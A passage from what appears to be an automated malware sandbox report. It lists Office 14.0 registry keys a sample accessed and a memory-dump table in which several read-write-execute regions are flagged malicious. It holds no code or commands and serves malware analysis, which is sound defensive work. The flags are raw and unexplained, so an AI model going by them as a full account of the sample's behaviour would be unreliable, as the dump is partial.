Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6FB5F
6FB5F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6FB5F
6FB5F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 458 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
43F0000
direct allocation
page execute and read and write
malicious
2E60000
system
page execute and read and write
malicious
2F80000
system
page execute and read and write
malicious
42A0000
direct allocation
page execute and read and write
malicious
2E60000
system
page execute and read and write
malicious
43C0000
direct allocation
page execute and read and write
malicious
4280000
direct allocation
page execute and read and write
malicious
810000
direct allocation
page execute and read and write
malicious
2F80000
system
page execute and read and write
malicious
4AA0000
direct allocation
page execute and read and write
malicious
2EC0000
system
page execute and read and write
malicious
2EC0000
system
page execute and read and write
malicious
4990000
direct allocation
page execute and read and write
malicious
4AF0000
direct allocation
page execute and read and write
malicious
4AD0000
direct allocation
page execute and read and write
malicious
30CB000
heap
page read and write
527E000
heap
page read and write
51B1000
direct allocation
page read and write
9790000
trusted library allocation
page read and write
521C000
heap
page read and write
83D0000
trusted library allocation
page read and write
94D0000
trusted library allocation
page read and write
7F04000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
5180000
heap
page execute and read and write
4870000
heap
page read and write
52B1000
heap
page read and write
305E000
stack
page read and write
9490000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
A3D0000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
342927D000
stack
page read and write
7631000
heap
page read and write
3390000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
583D000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9010000
unkown
page read and write
82E0000
trusted library allocation
page read and write
8400000
trusted library allocation
page read and write
4E7E000
stack
page read and write
9300000
trusted library allocation
page read and write
6F0000
remote allocation
page read and write
9650000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
72BD000
trusted library allocation
page read and write
42E0000
heap
page read and write
9490000
trusted library allocation
page read and write
4EF2000
heap
page read and write
9210000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
92E0000
unkown
page read and write
9020000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
B93CAFC000
stack
page read and write
9300000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
A430000
trusted library allocation
page read and write
920D000
trusted library allocation
page read and write
29A1848A000
heap
page read and write
9200000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
4710000
remote allocation
page read and write
A410000
trusted library allocation
page read and write
4710000
remote allocation
page read and write
93C0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
4EFF000
heap
page read and write
4EC0000
heap
page read and write
29F0000
direct allocation
page execute and read and write
94D0000
trusted library allocation
page read and write
9205000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
5200000
direct allocation
page read and write
8300000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9206000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
A1F8000
trusted library allocation
page read and write
C0FA000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
B0F0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
5081000
direct allocation
page read and write
1B55D613000
heap
page read and write
B040000
trusted library allocation
page read and write
2EF0000
remote allocation
page read and write
9010000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
4B60000
heap
page read and write
572F000
stack
page read and write
8450000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
20E29930000
heap
page read and write
93C0000
trusted library allocation
page read and write
BE53000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
7E30000
trusted library allocation
page read and write
1FB4404A000
heap
page read and write
61A2000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
254F9880000
trusted library allocation
page read and write
480E000
stack
page read and write
93A0000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
D096CFC000
stack
page read and write
94B0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
884000
heap
page read and write
9330000
trusted library allocation
page read and write
2D17F913000
heap
page read and write
9330000
trusted library allocation
page read and write
8450000
unkown
page read and write
5161000
heap
page read and write
9010000
trusted library allocation
page read and write
54DF000
stack
page read and write
93C0000
trusted library allocation
page read and write
B030000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9206000
trusted library allocation
page read and write
4EBE000
heap
page read and write
9350000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
1FB43E44000
trusted library allocation
page read and write
5269000
heap
page read and write
C83E2F9000
stack
page read and write
5072000
direct allocation
page read and write
270000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
8FF5000
trusted library allocation
page read and write
440A000
unkown
page readonly
9490000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8450000
unkown
page read and write
7280000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
5990000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9020000
unkown
page read and write
7B0000
remote allocation
page read and write
9480000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
5280000
heap
page read and write
9520000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
72F5000
trusted library allocation
page read and write
72A3000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
5281000
heap
page read and write
303E000
stack
page read and write
6E10000
heap
page read and write
1B55D420000
heap
page read and write
9460000
trusted library allocation
page read and write
95F0000
unkown
page read and write
9320000
trusted library allocation
page read and write
57E7000
trusted library allocation
page read and write
ABFE000
stack
page read and write
97A0000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
4421000
unkown
page execute read
92D0000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
508C000
stack
page read and write
82F0000
trusted library allocation
page read and write
59C6000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
13565345000
heap
page read and write
A3E0000
trusted library allocation
page read and write
1FB43F80000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
2D17F854000
heap
page read and write
93C0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
2BE0000
heap
page read and write
93E0000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
82F4000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
4F0000
remote allocation
page read and write
3480000
heap
page read and write
207B87F000
stack
page read and write
95F0000
unkown
page read and write
A420000
trusted library allocation
page read and write
46ED000
stack
page read and write
9400000
trusted library allocation
page read and write
1FB3E7F0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
52AB000
heap
page read and write
9500000
trusted library allocation
page execute and read and write
8458000
unkown
page read and write
7E46000
trusted library allocation
page read and write
1FB3E8B3000
heap
page read and write
A3E0000
trusted library allocation
page read and write
9219000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
B93CD7E000
stack
page read and write
FF0000
trusted library allocation
page read and write
3085000
heap
page read and write
A3F0000
trusted library allocation
page read and write
9209000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
1FB43E2E000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
4F6E000
stack
page read and write
9818000
trusted library allocation
page read and write
51A000
unkown
page readonly
901C000
trusted library allocation
page read and write
5040000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
949F000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
50F0000
direct allocation
page read and write
B93D0FF000
stack
page read and write
20E29A02000
heap
page read and write
8FF0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
5246000
heap
page read and write
9820000
trusted library allocation
page read and write
84371A000
stack
page read and write
77B0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
1FB43EF0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
A430000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
5AFB000
trusted library allocation
page read and write
8450000
unkown
page read and write
97A0000
trusted library allocation
page read and write
9C0000
direct allocation
page execute and read and write
93C0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
91F8000
trusted library allocation
page read and write
9200000
unkown
page read and write
1B55D410000
heap
page read and write
2D17F84A000
heap
page read and write
4EC1000
heap
page read and write
9800000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
1FB43E40000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
1B55D602000
heap
page read and write
8450000
unkown
page read and write
7290000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
794000
heap
page read and write
9780000
trusted library allocation
page read and write
4E00000
direct allocation
page read and write
9050000
trusted library allocation
page read and write
51CC000
direct allocation
page read and write
92D0000
trusted library allocation
page read and write
BE63000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
29A18370000
heap
page read and write
9780000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
1FB3F159000
heap
page read and write
4F7D000
trusted library allocation
page read and write
91F0000
unkown
page read and write
4F07000
heap
page read and write
7FBF0000
trusted library allocation
page execute and read and write
4EBF000
heap
page read and write
B93CE7F000
stack
page read and write
A400000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
28DBE7C000
stack
page read and write
92D0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
8284000
trusted library allocation
page read and write
3370000
heap
page read and write
9530000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
95BF000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
4F0D000
heap
page read and write
843A7F000
unkown
page read and write
2BBA000
heap
page read and write
8FF5000
unkown
page read and write
8450000
unkown
page read and write
8FF0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
5170000
trusted library allocation
page read and write
A3E7000
trusted library allocation
page read and write
8450000
unkown
page read and write
9450000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
77AE000
stack
page read and write
342907F000
stack
page read and write
2DD000
stack
page read and write
3377000
heap
page read and write
92B0000
trusted library allocation
page read and write
1CB48A49000
heap
page read and write
8FF0000
trusted library allocation
page read and write
2E90000
remote allocation
page read and write
9480000
trusted library allocation
page read and write
1CB48A4D000
heap
page read and write
207B27B000
stack
page read and write
8FF0000
unkown
page read and write
5743000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
2E50000
remote allocation
page read and write
B040000
trusted library allocation
page read and write
1FB440DE000
heap
page read and write
B024000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
9265000
trusted library allocation
page read and write
52B9000
heap
page read and write
9214000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
8FF4000
trusted library allocation
page read and write
8450000
unkown
page read and write
9205000
trusted library allocation
page read and write
2E92000
unkown
page read and write
9200000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
93DA000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
8450000
unkown
page read and write
B040000
trusted library allocation
page read and write
50C0000
heap
page read and write
A410000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
C83E479000
stack
page read and write
4EC0000
heap
page read and write
7220000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5A0C000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9560000
unkown
page read and write
8450000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
8450000
unkown
page read and write
9340000
trusted library allocation
page read and write
57BD000
trusted library allocation
page read and write
92B0000
unkown
page read and write
9520000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
A3C0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
576B000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8450000
unkown
page read and write
B040000
trusted library allocation
page read and write
4E1D000
trusted library allocation
page execute and read and write
1FB3E88A000
heap
page read and write
9660000
trusted library allocation
page read and write
254F98F0000
trusted library allocation
page read and write
4C37000
trusted library allocation
page read and write
A1EA000
trusted library allocation
page read and write
29A1844B000
heap
page read and write
9760000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
34E0000
heap
page read and write
97D9000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
684000
heap
page read and write
49F0000
remote allocation
page read and write
A9BE000
stack
page read and write
5261000
heap
page read and write
9330000
trusted library allocation
page read and write
5A91000
trusted library allocation
page read and write
8FF6000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
254F8F09000
heap
page read and write
97D0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
A430000
trusted library allocation
page read and write
2FB0000
remote allocation
page read and write
9730000
unkown
page read and write
29A18508000
heap
page read and write
1B55D580000
trusted library allocation
page read and write
4FAE000
stack
page read and write
A1C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
D096EF7000
stack
page read and write
FF0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
2E50000
remote allocation
page read and write
9560000
trusted library allocation
page read and write
7EC2000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
1FB3F100000
heap
page read and write
92F0000
trusted library allocation
page read and write
503D000
stack
page read and write
2B80000
direct allocation
page execute and read and write
135651C0000
heap
page read and write
BF0000
unkown
page readonly
93E0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
496E000
stack
page read and write
7370000
trusted library allocation
page read and write
9025000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
50D0000
direct allocation
page read and write
8450000
unkown
page read and write
8450000
unkown
page read and write
B93CBFB000
stack
page read and write
2BD6329D000
heap
page read and write
7500000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
E25000
heap
page read and write
794000
heap
page read and write
92F0000
trusted library allocation
page read and write
342937E000
stack
page read and write
7EE4000
trusted library allocation
page read and write
4F4E000
trusted library allocation
page read and write
4F2D000
trusted library allocation
page execute and read and write
9560000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9215000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
92E5000
trusted library allocation
page read and write
4180000
direct allocation
page read and write
8450000
trusted library allocation
page read and write
9725000
trusted library allocation
page read and write
1FB3F8E0000
trusted library section
page readonly
9300000
trusted library allocation
page read and write
42E3000
heap
page read and write
8FF4000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
4EF4000
heap
page read and write
7631000
heap
page read and write
1FB3F8D0000
trusted library section
page readonly
4DE6000
direct allocation
page read and write
9810000
trusted library allocation
page read and write
5800000
trusted library allocation
page read and write
58E0000
direct allocation
page read and write
A3F0000
trusted library allocation
page read and write
94D0000
trusted library allocation
page read and write
9267000
trusted library allocation
page read and write
B080000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
4EAD000
heap
page read and write
97D0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
843AF9000
unkown
page read and write
8455000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
2D17F869000
heap
page read and write
4920000
heap
page read and write
92F0000
trusted library allocation
page read and write
97D1000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
28DC3FF000
stack
page read and write
42F0000
unkown
page readonly
D3EF8FD000
stack
page read and write
520D000
heap
page read and write
9593000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
91F0000
unkown
page read and write
9800000
trusted library allocation
page execute and read and write
9790000
trusted library allocation
page read and write
B93C7FB000
stack
page read and write
4F73000
trusted library allocation
page read and write
254F8F00000
heap
page read and write
9300000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
8450000
unkown
page read and write
46FB000
stack
page read and write
1FB440A6000
heap
page read and write
7300000
trusted library allocation
page read and write
9455000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
29A18450000
heap
page read and write
8450000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page execute and read and write
3410000
heap
page read and write
5B68000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
29A18E02000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
C0EE000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
20E29A89000
heap
page read and write
9300000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
8450000
unkown
page read and write
341E000
stack
page read and write
72C0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
518E000
stack
page read and write
72D0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4991000
heap
page read and write
4EF5000
heap
page read and write
8450000
unkown
page read and write
5B83000
trusted library allocation
page read and write
4550000
direct allocation
page execute and read and write
9630000
trusted library allocation
page read and write
5238000
heap
page read and write
5249000
heap
page read and write
A3E0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
3485000
heap
page read and write
73B0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
526B000
heap
page read and write
8FF5000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9550000
trusted library allocation
